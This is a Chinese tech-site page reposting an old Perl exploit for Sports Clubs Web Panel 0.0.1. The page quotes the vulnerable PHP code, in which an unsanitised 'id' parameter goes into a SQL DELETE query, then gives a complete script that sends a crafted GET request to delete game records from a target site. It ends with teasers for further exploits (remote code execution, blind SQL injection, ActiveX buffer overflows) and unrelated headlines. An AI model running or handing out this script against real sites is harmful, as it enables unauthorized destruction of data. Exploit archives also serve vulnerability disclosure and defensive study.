首页
网页制作
网络编程
脚本专栏
数据库
网站运营
网络安全
平面设计
CMS教程
搜索
建站极客
网络安全
Exploit
正文
Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
所属分类:
网络安全
/
Exploit
阅读数: 129
收藏 0
赞 0
分享
#!/usr/bin/perl -W # Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
# File affected: include/draw-delete.php (id) # Vuln Code: # 06: $did = $_GET['id'];
# 08: mysql_query("DELETE FROM draw WHERE did='$did'"); # by ka0x <ka0x01 [at] gmail [dot] com>
# D.O.M Labs - Security Researchers
# - www.domlabs.org -
# # ka0x@domlabs:~/codes$ ./sportspanel.pl http://localhost/sportspanel 3
use LWP::UserAgent; my $host = $ARGV[0];
my $did = $ARGV[1]; die &_USAGE unless $ARGV[1]; sub _USAGE
{
die "
- Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit -
- by ka0x (www.domlabs.org) usage: ./$0 <host> <valid_game_id>
ex: ./$0 http://localhost/sportspanel 2
";
} my $ua = LWP::UserAgent->new() or die;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1"); my $req = HTTP::Request->new(GET => $host."/?p=draw-delete&id=".$did);
my $res = $ua->request($req);
my $con = $res->content; if ($res->is_success){
if($con =~ /$did/){
print "[ ] The Game \"$did\" has been deleted from the database!\n";
}
} else{
print "[-] Exploit Failed!";
} __END__
更多精彩内容
其他人还在看
LoveCMS 1.6.2 Final Remote Code Execution Exploit
#!/usr/bin/ruby # ## Exploit by PoMdaPiMp! ## --------------------- ## pomdapimp(at)gmail(dotcom) ## ## LoveCMS Exploi
评论 0
收藏 0
赞 0
分享
Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit
#!/usr/bin/perl # carved-out by: crit3rion, just making th3 world a b3tt3r plac3! # Xerox_Remote_DoS.20080801.ver01 (tanx to dr0pz0N3
评论 0
收藏 0
赞 0
分享
moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit
#!/usr/bin/perl # # moziloCMS 1.10.1 Perl exploit # # discovered & written by Ams # ax330d [doggy] gmail [dot] com # # DESCRIP
评论 0
收藏 0
赞 0
分享
Joomla Component EZ Store Remote Blind SQL Injection Exploit
#!/usr/bin/perl #Note:Sometimes you have to change the regexp to viewcategory/catid,".$cid." use LWP::UserAgent; use Get
评论 0
收藏 0
赞 0
分享
Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit
<!-- In addition to the overflow found in the "Friendly Technologies" dialers ActiveX, Here is a "remote command execu
评论 0
收藏 0
赞 0
分享
Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit
<!-- "Friendly Technologies" provide software like L2TP and PPPoE clients to ISPs, who give the software to their customers
评论 0
收藏 0
赞 0
分享
IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit
/* * IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Expoit * * Discovered & Written by r0ut3r (writ3r [at] gmail.com) *
评论 0
收藏 0
赞 0
分享
Ultra Office ActiveX Control Remote Buffer Overflow Exploit
----------------------------------------------------------------------------- Ultra Office ActiveX Control Remote Buffer Overflow url:
评论 0
收藏 0
赞 0
分享
Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit
Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote Buffer Overflow Exploit Author: Koshi Original POC: http://www.milw0rm.com/exploi
评论 0
收藏 0
赞 0
分享
MyBulletinBoard (MyBB)
<?php // forum mybb <= 1.2.11 remote sql injection vulnerability // bug found by Janek Vind "waraxe" http://www.waraxe
评论 0
收藏 0
赞 0
分享
查看更多
网络赚钱
更多
网上赚钱怎么赚钱?网上兼职的方法有哪些
青西一女子轻信网络刷单2小时赚400元 被骗15万元
怎么才能做好移动互联网营销?
广告如何投放才最正确有效?我就给你3个建议!
app开发者如何从应用程序中赚钱?
SEO中到底是流量重要还是转化率重要
站长故事
更多
为什么被黑的总是小米?
木屋烧烤创始人自述:屌丝的逆袭开餐饮店 连锁餐饮成功的五个因素
我眼里的2014年中国互联网大会亮点
揭秘互联网骗子怎么做到月入过万
比较适合个人站长的5种类型网站:定位 坚持 收益
为什么知乎做起来了?市场竞争的魅力和价值